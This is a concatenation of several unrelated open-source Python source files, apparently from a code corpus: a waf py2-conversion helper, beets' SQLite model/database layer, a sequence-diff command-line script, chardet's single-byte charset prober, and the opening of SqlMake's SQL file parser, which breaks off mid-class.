    waflib_dir = os.path.join(dir, 'waflib')
    for name, funs in all_modifs.items():
        for fun in funs:
            modif(waflib_dir, name, fun)
def modif(dir, name, fun):
    """Rewrite dir/name in place through fun.

    A name of '*' expands to every .py file directly under the '.',
    'Tools' and 'extras' subdirectories of dir, each processed in turn.
    """
    if name == '*':
        targets = []
        for sub in '. Tools extras'.split():
            for entry in os.listdir(os.path.join(dir, sub)):
                if entry.endswith('.py'):
                    targets.append(sub + os.sep + entry)
        for target in targets:
            modif(dir, target, fun)
        return

    filename = os.path.join(dir, name)
    f = open(filename, 'r')
    try:
        txt = f.read()
    finally:
        f.close()

    txt = fun(txt)

    f = open(filename, 'w')
    try:
        f.write(txt)
    finally:
        f.close()
def subst(*k):
    """Decorator factory: register the decorated transform under each
    key in k (a key is a file name, or '*' for all files)."""
    def do_subst(fun):
        global all_modifs
        for key in k:
            all_modifs.setdefault(key, []).append(fun)
        return fun
    return do_subst
@subst('*')
def r1(code):
    # NOTE(review): all three replacements below are no-ops (identical
    # search/replace text, or empty strings).  Upstream waf's fixpy2.r1
    # performs real py3->py2 source rewrites here; this copy appears to
    # have been mangled -- compare against the waf distribution before
    # relying on it.
    code=code.replace(',e:',',e:')
    code=code.replace("",'')
    code=code.replace('','')
    return code
@subst('Runner.py')
def r4(code):
    """Rewrite the py3 iterator call in Runner.py back to the py2
    .next() form."""
    return code.replace('next(self.biter)', 'self.biter.next()')
| gpl-2.0 |
DxCx/nzbToMedia | libs/beets/dbcore/db.py | 9 | 24566 | # This file is part of beets.
# Copyright 2014, Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""The central Model and Database constructs for DBCore.
"""
import time
import os
from collections import defaultdict
import threading
import sqlite3
import contextlib
import beets
from beets.util.functemplate import Template
from .query import MatchQuery
# Abstract base for model classes.
class Model(object):
"""An abstract object representing an object in the database. Model
objects act like dictionaries (i.e., the allow subscript access like
``obj['field']``). The same field set is available via attribute
access as a shortcut (i.e., ``obj.field``). Three kinds of attributes are
available:
* **Fixed attributes** come from a predetermined list of field
names. These fields correspond to SQLite table columns and are
thus fast to read, write, and query.
* **Flexible attributes** are free-form and do not need to be listed
ahead of time.
* **Computed attributes** are read-only fields computed by a getter
function provided by a plugin.
Access to all three field types is uniform: ``obj.field`` works the
same regardless of whether ``field`` is fixed, flexible, or
computed.
Model objects can optionally be associated with a `Library` object,
in which case they can be loaded and stored from the database. Dirty
flags are used to track which fields need to be stored.
"""
# Abstract components (to be provided by subclasses).
_table = None
"""The main SQLite table name.
"""
_flex_table = None
"""The flex field SQLite table name.
"""
_fields = {}
"""A mapping indicating available "fixed" fields on this type. The
keys are field names and the values are Type objects.
"""
_bytes_keys = ()
"""Keys whose values should be stored as raw bytes blobs rather than
strings.
"""
_search_fields = ()
"""The fields that should be queried by default by unqualified query
terms.
"""
@classmethod
def _getters(cls):
"""Return a mapping from field names to getter functions.
"""
# We could cache this if it becomes a performance problem to
# gather the getter mapping every time.
raise NotImplementedError()
def _template_funcs(self):
"""Return a mapping from function names to text-transformer
functions.
"""
# As above: we could consider caching this result.
raise NotImplementedError()
# Basic operation.
def __init__(self, db=None, **values):
"""Create a new object with an optional Database association and
initial field values.
"""
self._db = db
self._dirty = set()
self._values_fixed = {}
self._values_flex = {}
# Initial contents.
self.update(values)
self.clear_dirty()
def __repr__(self):
return '{0}({1})'.format(
type(self).__name__,
', '.join('{0}={1!r}'.format(k, v) for k, v in dict(self).items()),
)
def clear_dirty(self):
"""Mark all fields as *clean* (i.e., not needing to be stored to
the database).
"""
self._dirty = set()
def _check_db(self, need_id=True):
"""Ensure that this object is associated with a database row: it
has a reference to a database (`_db`) and an id. A ValueError
exception is raised otherwise.
"""
if not self._db:
raise ValueError('{0} has no database'.format(type(self).__name__))
if need_id and not self.id:
raise ValueError('{0} has no id'.format(type(self).__name__))
# Essential field accessors.
    def __getitem__(self, key):
        """Get the value for a field. Raise a KeyError if the field is
        not available.
        """
        getters = self._getters()
        if key in getters: # Computed.
            return getters[key](self)
        elif key in self._fields: # Fixed.
            # NOTE(review): fixed fields use .get(), so an unset fixed
            # field yields None rather than the KeyError the docstring
            # promises -- only unknown keys raise.  Presumably intended
            # (fixed fields always "exist"); confirm before changing.
            return self._values_fixed.get(key)
        elif key in self._values_flex: # Flexible.
            return self._values_flex[key]
        else:
            raise KeyError(key)
def __setitem__(self, key, value):
"""Assign the value for a field.
"""
source = self._values_fixed if key in self._fields \
else self._values_flex
old_value = source.get(key)
source[key] = value
if old_value != value:
self._dirty.add(key)
def __delitem__(self, key):
"""Remove a flexible attribute from the model.
"""
if key in self._values_flex: # Flexible.
del self._values_flex[key]
self._dirty.add(key) # Mark for dropping on store.
elif key in self._getters(): # Computed.
raise KeyError('computed field {0} cannot be deleted'.format(key))
elif key in self._fields: # Fixed.
raise KeyError('fixed field {0} cannot be deleted'.format(key))
else:
raise KeyError('no such field {0}'.format(key))
def keys(self, computed=False):
"""Get a list of available field names for this object. The
`computed` parameter controls whether computed (plugin-provided)
fields are included in the key list.
"""
base_keys = list(self._fields) + self._values_flex.keys()
if computed:
return base_keys + self._getters().keys()
else:
return base_keys
# Act like a dictionary.
def update(self, values):
"""Assign all values in the given dict.
"""
for key, value in values.items():
self[key] = value
def items(self):
"""Iterate over (key, value) pairs that this object contains.
Computed fields are not included.
"""
for key in self:
yield key, self[key]
def get(self, key, default=None):
"""Get the value for a given key or `default` if it does not
exist.
"""
if key in self:
return self[key]
else:
return default
def __contains__(self, key):
"""Determine whether `key` is an attribute on this object.
"""
return key in self.keys(True)
def __iter__(self):
"""Iterate over the available field names (excluding computed
fields).
"""
return iter(self.keys())
# Convenient attribute access.
def __getattr__(self, key):
if key.startswith('_'):
raise AttributeError('model has no attribute {0!r}'.format(key))
else:
try:
return self[key]
except KeyError:
raise AttributeError('no such field {0!r}'.format(key))
def __setattr__(self, key, value):
if key.startswith('_'):
super(Model, self).__setattr__(key, value)
else:
self[key] = value
def __delattr__(self, key):
if key.startswith('_'):
super(Model, self).__delattr__(key)
else:
del self[key]
# Database interaction (CRUD methods).
    def store(self):
        """Save the object's metadata into the library database.

        Dirty fixed fields are written with a single UPDATE; dirty
        flexible attributes are upserted into the flex table; any key
        still left in `_dirty` after those two passes was removed via
        __delitem__ and has its flex row deleted.
        """
        self._check_db()
        # Build assignments for query.
        assignments = ''
        subvars = []
        for key in self._fields:
            if key != 'id' and key in self._dirty:
                self._dirty.remove(key)
                assignments += key + '=?,'
                value = self[key]
                # Wrap path strings in buffers so they get stored
                # "in the raw" (Python 2 `buffer`/`str` types).
                if key in self._bytes_keys and isinstance(value, str):
                    value = buffer(value)
                subvars.append(value)
        assignments = assignments[:-1] # Knock off last ,
        with self._db.transaction() as tx:
            # Main table update.
            if assignments:
                query = 'UPDATE {0} SET {1} WHERE id=?'.format(
                    self._table, assignments
                )
                subvars.append(self.id)
                tx.mutate(query, subvars)
            # Modified/added flexible attributes. The flex table carries
            # UNIQUE(entity_id, key) ON CONFLICT REPLACE (see
            # _make_attribute_table), so a plain INSERT acts as an upsert.
            for key, value in self._values_flex.items():
                if key in self._dirty:
                    self._dirty.remove(key)
                    tx.mutate(
                        'INSERT INTO {0} '
                        '(entity_id, key, value) '
                        'VALUES (?, ?, ?);'.format(self._flex_table),
                        (self.id, key, value),
                    )
            # Deleted flexible attributes: whatever remains in _dirty has
            # no current value and must be dropped from the flex table.
            for key in self._dirty:
                tx.mutate(
                    'DELETE FROM {0} '
                    'WHERE entity_id=? AND key=?'.format(self._flex_table),
                    (self.id, key)
                )
        self.clear_dirty()
def load(self):
"""Refresh the object's metadata from the library database.
"""
self._check_db()
stored_obj = self._db._get(type(self), self.id)
assert stored_obj is not None, "object {0} not in DB".format(self.id)
self.update(dict(stored_obj))
self.clear_dirty()
def remove(self):
"""Remove the object's associated rows from the database.
"""
self._check_db()
with self._db.transaction() as tx:
tx.mutate(
'DELETE FROM {0} WHERE id=?'.format(self._table),
(self.id,)
)
tx.mutate(
'DELETE FROM {0} WHERE entity_id=?'.format(self._flex_table),
(self.id,)
)
    def add(self, db=None):
        """Add the object to the library database. This object must be
        associated with a database; you can provide one via the `db`
        parameter or use the currently associated database.
        The object's `id` and `added` fields are set along with any
        current field values.
        """
        if db:
            self._db = db
        # NOTE(review): _check_db is defined outside this chunk;
        # presumably the False argument skips the "has an id" check,
        # since the id is only assigned below — confirm.
        self._check_db(False)
        with self._db.transaction() as tx:
            # Insert an empty row first so SQLite assigns the id...
            new_id = tx.mutate(
                'INSERT INTO {0} DEFAULT VALUES'.format(self._table)
            )
            self.id = new_id
            self.added = time.time()  # `time` imported at module level
            # ...then mark every non-null field as dirty and store, which
            # fills in the remaining columns inside the same transaction.
            for key in self:
                if self[key] is not None:
                    self._dirty.add(key)
            self.store()
# Formatting and templating.
    @classmethod
    def _format(cls, key, value, for_path=False):
        """Format a value as the given field for this model.

        Returns a unicode string. Typed fields delegate to the field's
        own format(); everything else falls through a Python 2
        bytes/unicode coercion ladder. When `for_path` is true, path
        separators in the result are replaced so the value is safe to
        embed in a single path component.
        """
        # Format the value as a string according to its type, if any.
        if key in cls._fields:
            value = cls._fields[key].format(value)
            # Formatting must result in a string. To deal with
            # Python2isms, implicitly convert ASCII strings.
            assert isinstance(value, basestring), \
                u'field formatter must produce strings'
            if isinstance(value, bytes):
                value = value.decode('utf8', 'ignore')
        elif not isinstance(value, unicode):
            # Fallback formatter. Convert to unicode at all cost.
            if value is None:
                value = u''
            elif isinstance(value, basestring):
                if isinstance(value, bytes):
                    value = value.decode('utf8', 'ignore')
            else:
                value = unicode(value)
        if for_path:
            # Replacement string comes from global configuration; both the
            # primary and (platform-dependent) alternate separator are
            # scrubbed. os.path.altsep may be None, hence the `if sep`.
            sep_repl = beets.config['path_sep_replace'].get(unicode)
            for sep in (os.path.sep, os.path.altsep):
                if sep:
                    value = value.replace(sep, sep_repl)
        return value
def _get_formatted(self, key, for_path=False):
"""Get a field value formatted as a string (`unicode` object)
for display to the user. If `for_path` is true, then the value
will be sanitized for inclusion in a pathname (i.e., path
separators will be removed from the value).
"""
return self._format(key, self.get(key), for_path)
def _formatted_mapping(self, for_path=False):
"""Get a mapping containing all values on this object formatted
as human-readable strings.
"""
# In the future, this could be made "lazy" to avoid computing
# fields unnecessarily.
out = {}
for key in self.keys(True):
out[key] = self._get_formatted(key, for_path)
return out
def evaluate_template(self, template, for_path=False):
"""Evaluate a template (a string or a `Template` object) using
the object's fields. If `for_path` is true, then no new path
separators will be added to the template.
"""
# Build value mapping.
mapping = self._formatted_mapping(for_path)
# Get template functions.
funcs = self._template_funcs()
# Perform substitution.
if isinstance(template, basestring):
template = Template(template)
return template.substitute(mapping, funcs)
# Parsing.
@classmethod
def _parse(cls, key, string):
"""Parse a string as a value for the given key.
"""
if not isinstance(string, basestring):
raise TypeError("_parse() argument must be a string")
typ = cls._fields.get(key)
if typ:
return typ.parse(string)
else:
# Fall back to unparsed string.
return string
# Database controller and supporting interfaces.
class Results(object):
    """An item query result set. Iterating over the collection lazily
    constructs LibModel objects that reflect database rows.
    """
    def __init__(self, model_class, rows, db, query=None):
        """Create a result set that will construct objects of type
        `model_class`, which should be a subclass of `LibModel`, out of
        the query result mapping in `rows`. The new objects are
        associated with the database `db`. If `query` is provided, it is
        used as a predicate to filter the results for a "slow query" that
        cannot be evaluated by the database directly.
        """
        self.model_class = model_class
        self.rows = rows
        self.db = db
        self.query = query

    def __iter__(self):
        """Construct Python objects for all rows that pass the query
        predicate.
        """
        for row in self.rows:
            # Get the flexible attributes for the object. One extra
            # query/transaction is issued per row.
            with self.db.transaction() as tx:
                flex_rows = tx.query(
                    'SELECT * FROM {0} WHERE entity_id=?'.format(
                        self.model_class._flex_table
                    ),
                    (row['id'],)
                )
            # Flexible values are merged over the fixed columns, so a
            # flex attribute with the same name as a column wins.
            values = dict(row)
            values.update(
                dict((row['key'], row['value']) for row in flex_rows)
            )
            # Construct the Python object and yield it if it passes the
            # predicate.
            obj = self.model_class(self.db, **values)
            if not self.query or self.query.match(obj):
                yield obj

    def __len__(self):
        """Get the number of matching objects.
        """
        if self.query:
            # A slow query. Fall back to testing every object
            # (materializes each candidate; O(n) with per-row queries).
            count = 0
            for obj in self:
                count += 1
            return count
        else:
            # A fast query. Just count the rows.
            return len(self.rows)

    def __nonzero__(self):
        """Does this result contain any objects?
        """
        # Python 2 truthiness hook (Python 3 would need __bool__).
        return bool(len(self))

    def __getitem__(self, n):
        """Get the nth item in this result set. This is inefficient: all
        items up to n are materialized and thrown away.
        """
        it = iter(self)
        try:
            # Python 2 iterator protocol (`next()` method).
            for i in range(n):
                it.next()
            return it.next()
        except StopIteration:
            raise IndexError('result index {0} out of range'.format(n))

    def get(self):
        """Return the first matching object, or None if no objects
        match.
        """
        it = iter(self)
        try:
            return it.next()
        except StopIteration:
            return None
class Transaction(object):
    """A context manager for safe, concurrent access to the database.
    All SQL commands should be executed through a transaction.

    Transactions nest per thread: only the outermost ("root")
    transaction acquires the global database lock and commits on exit.
    """
    def __init__(self, db):
        self.db = db

    def __enter__(self):
        """Begin a transaction. This transaction may be created while
        another is active in a different thread.
        """
        # Register on this thread's stack first (under the shared map
        # lock), then take the global DB lock only for root transactions.
        with self.db._tx_stack() as stack:
            first = not stack
            stack.append(self)
        if first:
            # Beginning a "root" transaction, which corresponds to an
            # SQLite transaction.
            self.db._db_lock.acquire()
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        """Complete a transaction. This must be the most recently
        entered but not yet exited transaction. If it is the last active
        transaction, the database updates are committed.
        """
        with self.db._tx_stack() as stack:
            assert stack.pop() is self
            empty = not stack
        if empty:
            # Ending a "root" transaction. End the SQLite transaction.
            # NOTE(review): exc_type is ignored, so changes are committed
            # even when the body raised — there is no rollback path here.
            self.db._connection().commit()
            self.db._db_lock.release()

    def query(self, statement, subvals=()):
        """Execute an SQL statement with substitution values and return
        a list of rows from the database.
        """
        cursor = self.db._connection().execute(statement, subvals)
        return cursor.fetchall()

    def mutate(self, statement, subvals=()):
        """Execute an SQL statement with substitution values and return
        the row ID of the last affected row.
        """
        cursor = self.db._connection().execute(statement, subvals)
        return cursor.lastrowid

    def script(self, statements):
        """Execute a string containing multiple SQL statements."""
        self.db._connection().executescript(statements)
class Database(object):
    """A container for Model objects that wraps an SQLite database as
    the backend.

    One SQLite connection is maintained per thread and all access is
    funneled through `Transaction` objects so only a single SQLite
    transaction is active at any time.
    """
    _models = ()
    """The Model subclasses representing tables in this database.
    """

    def __init__(self, path):
        """Open (or create) the SQLite database at `path` and ensure the
        schema for every class listed in `_models` exists.
        """
        self.path = path

        # Per-thread private resources, keyed by thread ident.
        self._connections = {}
        self._tx_stacks = defaultdict(list)

        # A lock to protect the _connections and _tx_stacks maps, which
        # both map thread IDs to private resources.
        self._shared_map_lock = threading.Lock()

        # A lock to protect access to the database itself. SQLite does
        # allow multiple threads to access the database at the same
        # time, but many users were experiencing crashes related to this
        # capability: where SQLite was compiled without HAVE_USLEEP, its
        # backoff algorithm in the case of contention was causing
        # whole-second sleeps (!) that would trigger its internal
        # timeout. Using this lock ensures only one SQLite transaction
        # is active at a time.
        self._db_lock = threading.Lock()

        # Set up database schema.
        for model_cls in self._models:
            self._make_table(model_cls._table, model_cls._fields)
            self._make_attribute_table(model_cls._flex_table)

    # Primitive access control: connections and transactions.

    def _connection(self):
        """Get a SQLite connection object to the underlying database.
        One connection object is created per thread.
        """
        thread_id = threading.current_thread().ident
        with self._shared_map_lock:
            if thread_id in self._connections:
                return self._connections[thread_id]
            else:
                # Make a new connection.
                conn = sqlite3.connect(
                    self.path,
                    timeout=beets.config['timeout'].as_number(),
                )
                # Access SELECT results like dictionaries.
                conn.row_factory = sqlite3.Row
                self._connections[thread_id] = conn
                return conn

    @contextlib.contextmanager
    def _tx_stack(self):
        """A context manager providing access to the current thread's
        transaction stack. The context manager synchronizes access to
        the stack map. Transactions should never migrate across threads.
        """
        thread_id = threading.current_thread().ident
        with self._shared_map_lock:
            yield self._tx_stacks[thread_id]

    def transaction(self):
        """Get a :class:`Transaction` object for interacting directly
        with the underlying SQLite database.
        """
        return Transaction(self)

    # Schema setup and migration.

    def _make_table(self, table, fields):
        """Set up the schema of the database. `fields` is a mapping
        from field names to `Type`s. Columns are added if necessary.
        """
        # Get current schema.
        with self.transaction() as tx:
            rows = tx.query('PRAGMA table_info(%s)' % table)
        current_fields = set([row[1] for row in rows])
        field_names = set(fields.keys())
        if current_fields.issuperset(field_names):
            # Table exists and has all the required columns.
            return
        if not current_fields:
            # No table exists.
            columns = []
            for name, typ in fields.items():
                columns.append('{0} {1}'.format(name, typ.sql))
            setup_sql = 'CREATE TABLE {0} ({1});\n'.format(table,
                                                           ', '.join(columns))
        else:
            # Table exists but does not match the field set: add the
            # missing columns (existing columns are never altered).
            setup_sql = ''
            for name, typ in fields.items():
                if name in current_fields:
                    continue
                setup_sql += 'ALTER TABLE {0} ADD COLUMN {1} {2};\n'.format(
                    table, name, typ.sql
                )
        with self.transaction() as tx:
            tx.script(setup_sql)

    def _make_attribute_table(self, flex_table):
        """Create a table and associated index for flexible attributes
        for the given entity (if they don't exist).
        """
        with self.transaction() as tx:
            tx.script("""
                CREATE TABLE IF NOT EXISTS {0} (
                    id INTEGER PRIMARY KEY,
                    entity_id INTEGER,
                    key TEXT,
                    value TEXT,
                    UNIQUE(entity_id, key) ON CONFLICT REPLACE);
                CREATE INDEX IF NOT EXISTS {0}_by_entity
                    ON {0} (entity_id);
                """.format(flex_table))

    # Querying.

    def _fetch(self, model_cls, query, order_by=None):
        """Fetch the objects of type `model_cls` matching the given
        query. The query may be given as a string, string sequence, a
        Query object, or None (to fetch everything). If provided,
        `order_by` is a SQLite ORDER BY clause for sorting.
        """
        # BUG FIX: honor the documented `query=None` ("fetch everything")
        # case. Previously query.clause() was called unconditionally and
        # raised AttributeError for None.
        if query is not None:
            where, subvals = query.clause()
        else:
            where, subvals = None, ()
        sql = "SELECT * FROM {0} WHERE {1}".format(
            model_cls._table,
            where or '1',
        )
        if order_by:
            sql += " ORDER BY {0}".format(order_by)
        with self.transaction() as tx:
            rows = tx.query(sql, subvals)
        # When `where` is empty the query could not be pushed into SQL,
        # so pass it through for slow (per-object) filtering.
        return Results(model_cls, rows, self, None if where else query)

    def _get(self, model_cls, id):
        """Get a Model object by its id or None if the id does not
        exist.
        """
        return self._fetch(model_cls, MatchQuery('id', id)).get()
| gpl-3.0 |
xingniu/nlp-util | sequence-diff.py | 1 | 5138 | #!/usr/bin/env python -*- coding: utf-8 -*-
import argparse
import utils
from difflib import ndiff
# Diff granularity values accepted by the --mode option below.
MODE_CHAR = "char"    # compute diffs character by character (via ndiff)
MODE_TOKEN = "token"  # compute diffs on whitespace-split tokens
if __name__ == "__main__":
    # Command-line driver: print differences between parallel sequence
    # files, line by line, either in condensed or detailed (diff) form.
    parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser.add_argument('-f', '--file', required=True, nargs='+',
                        help='input files of sequences to be compared (the first file is the base '
                             'to be compared with, such as reference translations)')
    parser.add_argument('-c', '--const', required=False, nargs='+', default=[],
                        help='files of sequences not participating in the comparison, '
                             'such as source sentences to be translated')
    parser.add_argument('-ft', '--file-tag', required=False, nargs='+', help='tags of input files')
    parser.add_argument('-ct', '--const-tag', required=False, nargs='+', help='tags of const files')
    parser.add_argument('-d', '--condense', required=False, action="store_true",
                        help='condense the comparison of multiple sequences without showing diffs')
    parser.add_argument('-m', '--mode', choices=[MODE_CHAR, MODE_TOKEN], default=MODE_CHAR,
                        help='compute diffs at character level or token level')
    parser.add_argument('-v', '--verbose', required=False, action="store_true",
                        help='print all sequences in the condense mode')
    args = parser.parse_args()

    if len(args.file) < 2:
        utils.error("At least two files should be provided for comparison.")

    # Build the display tag list: const-file tags first, then input-file tags.
    tags = []
    if args.const_tag is not None:
        if len(args.const) != len(args.const_tag):
            utils.error("The number of const files and tags should be the same.")
        else:
            tags = args.const_tag
    else:
        for i in range(len(args.const)):
            tags.append("CONST-%d" % (i+1))
    if args.file_tag is not None:
        if len(args.file) != len(args.file_tag):
            utils.error("The number of input files and tags should be the same.")
        else:
            tags += args.file_tag
    else:
        tags.append("SEQUE-B")
        for i in range(1, len(args.file)):
            tags.append("SEQUE-%d" % (i+1))

    max_tag_len = max(len(t) for t in tags)
    diff_counter = 0
    # BUG FIX: initialize counter so the summary line below does not raise
    # NameError when all input files are empty (zip yields nothing).
    counter = 0
    files = [open(f) for f in args.const+args.file]
    ref_index = len(args.const)  # files[ref_index] is the base sequence file

    for counter, lines in enumerate(zip(*files), start=1):
        lines = list(lines)
        # Collect the distinct (stripped) sequences among the compared files.
        seq_set = set()
        for i in range(ref_index, len(files)):
            lines[i] = lines[i].strip()
            seq_set.add(lines[i])
        if len(seq_set) > 1 or args.verbose:
            # Print the const (context) lines, e.g. source sentences.
            for i in range(ref_index):
                print("%d %s\t%s" % (counter, tags[i], lines[i].strip()))
            print("." * 100)
        if args.verbose or len(seq_set) > 1 and args.condense:
            print("%d %s\t%s" % (counter, tags[ref_index], lines[ref_index]))
        found_first_diff = False
        for i in range(ref_index+1, len(files)):
            has_diff = lines[ref_index] != lines[i]
            if args.verbose or has_diff and args.condense:
                print("%d %s\t%s" % (counter, tags[i], lines[i]))
            if has_diff and not args.verbose and not args.condense:
                if found_first_diff:
                    print("." * 100)
                if args.mode == MODE_CHAR:
                    # Character-level diff: print the '-' line (base), the
                    # '+' line (candidate), and the '?' guide line aligned
                    # under them.
                    diff_spaces = " " * (len(str(counter)) + max_tag_len + 1)
                    for dl in ndiff([lines[ref_index]], [lines[i]]):
                        if dl[0] == '-':
                            print("%d %s\t%s" % (counter, tags[ref_index], dl.strip()[2:]))
                        elif dl[0] == '+':
                            print("%d %s\t%s" % (counter, tags[i], dl.strip()[2:]))
                        else:
                            print("%s\t%s" % (diff_spaces, dl.strip()[2:]))
                elif args.mode == MODE_TOKEN:
                    # Token-level diff: pair adjacent '-'/'+' lines into
                    # "base -> candidate" edits; unpaired '+'/'-' tokens are
                    # reported as-is.
                    print("%d %s\t%s" % (counter, tags[ref_index], lines[ref_index]))
                    print("%d %s\t%s" % (counter, tags[i], lines[i]))
                    edits = []
                    last_dl = " "
                    for dl in ndiff(lines[ref_index].split(), lines[i].split()):
                        if dl[0] == '-' and last_dl[0] == '+':
                            edits.append("%s -> %s" % (dl[2:], last_dl[2:]))
                            last_dl = " "
                        elif dl[0] == '+' and last_dl[0] == '-':
                            edits.append("%s -> %s" % (last_dl[2:], dl[2:]))
                            last_dl = " "
                        elif dl[0] != '?':
                            if last_dl[0] == '+' or last_dl[0] == '-':
                                edits.append(last_dl)
                            last_dl = dl
                    # BUG FIX: flush a trailing unpaired '+'/'-' edit; it was
                    # silently dropped when the diff ended on an insertion or
                    # deletion.
                    if last_dl[0] == '+' or last_dl[0] == '-':
                        edits.append(last_dl)
                    print(edits)
                found_first_diff = True
        if len(seq_set) > 1 or args.verbose:
            print("=" * 100)
        if len(seq_set) > 1:
            diff_counter += 1

    # BUG FIX: close the input files instead of leaking the handles.
    for f in files:
        f.close()
    print("%d lines read and %d diffs found" % (counter, diff_counter))
| mit |
alsotoes/vsphere-examples | python/.venv/lib/python2.6/site-packages/requests/packages/chardet/sbcharsetprober.py | 2927 | 4793 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
from . import constants
from .charsetprober import CharSetProber
from .compat import wrap_ord
# Character orders below this value participate in the bigram
# (sequence) statistics collected by feed().
SAMPLE_SIZE = 64
# Minimum number of observed sequences before the shortcut thresholds
# below are consulted in feed().
SB_ENOUGH_REL_THRESHOLD = 1024
# Confidence above which feed() moves the prober to eFoundIt.
POSITIVE_SHORTCUT_THRESHOLD = 0.95
# Confidence below which feed() moves the prober to eNotMe.
NEGATIVE_SHORTCUT_THRESHOLD = 0.05
# Character orders at or above this value are not counted toward
# _mTotalChar in feed().
SYMBOL_CAT_ORDER = 250
# Number of sequence-likelihood categories in each model's precedence
# matrix; _mSeqCounters keeps one tally per category.
NUMBER_OF_SEQ_CAT = 4
POSITIVE_CAT = NUMBER_OF_SEQ_CAT - 1  # index of the most-likely category
#NEGATIVE_CAT = 0
class SingleByteCharSetProber(CharSetProber):
    """Probe for a single-byte charset by scoring character-pair
    (bigram) frequencies against a language model.

    `model` is a dict providing 'charToOrderMap', 'precedenceMatrix',
    'charsetName', 'keepEnglishLetter' and 'mTypicalPositiveRatio'.
    """
    def __init__(self, model, reversed=False, nameProber=None):
        CharSetProber.__init__(self)
        self._mModel = model
        # TRUE if we need to reverse every pair in the model lookup
        self._mReversed = reversed
        # Optional auxiliary prober for name decision
        self._mNameProber = nameProber
        self.reset()

    def reset(self):
        """Reset all running statistics for a fresh detection pass."""
        CharSetProber.reset(self)
        # char order of last character
        self._mLastOrder = 255
        self._mSeqCounters = [0] * NUMBER_OF_SEQ_CAT
        self._mTotalSeqs = 0
        self._mTotalChar = 0
        # characters that fall in our sampling range
        self._mFreqChar = 0

    def get_charset_name(self):
        # Delegate to the name prober when one was supplied (used when a
        # single model serves several charsets); otherwise report the
        # model's own charset name.
        if self._mNameProber:
            return self._mNameProber.get_charset_name()
        else:
            return self._mModel['charsetName']

    def feed(self, aBuf):
        """Consume a chunk of bytes, update the bigram statistics and
        return the prober's (possibly updated) detection state.
        """
        if not self._mModel['keepEnglishLetter']:
            aBuf = self.filter_without_english_letters(aBuf)
        aLen = len(aBuf)
        if not aLen:
            return self.get_state()
        for c in aBuf:
            # Map the byte to its frequency order in this language model.
            order = self._mModel['charToOrderMap'][wrap_ord(c)]
            if order < SYMBOL_CAT_ORDER:
                self._mTotalChar += 1
            if order < SAMPLE_SIZE:
                self._mFreqChar += 1
                # Only count a sequence when the previous char was also
                # inside the sampled range.
                if self._mLastOrder < SAMPLE_SIZE:
                    self._mTotalSeqs += 1
                    if not self._mReversed:
                        i = (self._mLastOrder * SAMPLE_SIZE) + order
                        model = self._mModel['precedenceMatrix'][i]
                    else:  # reverse the order of the letters in the lookup
                        i = (order * SAMPLE_SIZE) + self._mLastOrder
                        model = self._mModel['precedenceMatrix'][i]
                    self._mSeqCounters[model] += 1
            self._mLastOrder = order
        # After enough sequences, short-circuit to a definite answer when
        # confidence is extreme in either direction.
        if self.get_state() == constants.eDetecting:
            if self._mTotalSeqs > SB_ENOUGH_REL_THRESHOLD:
                cf = self.get_confidence()
                if cf > POSITIVE_SHORTCUT_THRESHOLD:
                    if constants._debug:
                        # NOTE(review): adjacent literals concatenate with no
                        # space ("awinner"); debug-only message, left as-is.
                        sys.stderr.write('%s confidence = %s, we have a'
                                         'winner\n' %
                                         (self._mModel['charsetName'], cf))
                    self._mState = constants.eFoundIt
                elif cf < NEGATIVE_SHORTCUT_THRESHOLD:
                    if constants._debug:
                        sys.stderr.write('%s confidence = %s, below negative'
                                         'shortcut threshhold %s\n' %
                                         (self._mModel['charsetName'], cf,
                                          NEGATIVE_SHORTCUT_THRESHOLD))
                    self._mState = constants.eNotMe
        return self.get_state()

    def get_confidence(self):
        """Return a confidence in (0, 0.99]: the share of "positive"
        sequences relative to the model's typical ratio, scaled by the
        fraction of frequent characters seen.
        """
        r = 0.01
        if self._mTotalSeqs > 0:
            r = ((1.0 * self._mSeqCounters[POSITIVE_CAT]) / self._mTotalSeqs
                 / self._mModel['mTypicalPositiveRatio'])
            r = r * self._mFreqChar / self._mTotalChar
        if r >= 1.0:
            r = 0.99
        return r
| gpl-3.0 |
amvtek/SqlMake | sqlmake/fileparser.py | 1 | 3515 | # -*- coding: utf-8 -*-
"""
fileparser
~~~~~~~~~~
parse SQL file making use of special comments
that defines dependencies & variables...
:copyright: (c) 2014 by sc AmvTek srl
:email: devel@amvtek.com
"""
import re
from os.path import abspath
from jinja2 import Environment # see PyPI jinja2
class ContentParser(object):
    """Parse SQL file content, extracting the special `--# DEPS:` and
    `--# VARS:` directive comments and turning the remaining text into a
    jinja2-style template string.
    """

    _lineTokenSep = ','

    _extractDEPS = re.compile(r"^--#\s*DEPS\s*:(.*)$", re.MULTILINE)
    _isDEPSLine = re.compile(r"^--#\s*DEPS\s*:.*$", re.MULTILINE)

    _extractVARS = re.compile(r"^--#\s*VARS\s*:(.*)$", re.MULTILINE)
    _isVARSLine = re.compile(r"^--#\s*VARS\s*:.*$", re.MULTILINE)

    _extractVarDef = re.compile(r"^\s*(\w+)(?:\=\s*(\w+)){0,1}$")

    def split_token(self, contentline):
        "return list of token"
        return [piece.strip()
                for piece in contentline.split(self._lineTokenSep)]

    def _collect(self, pattern, content):
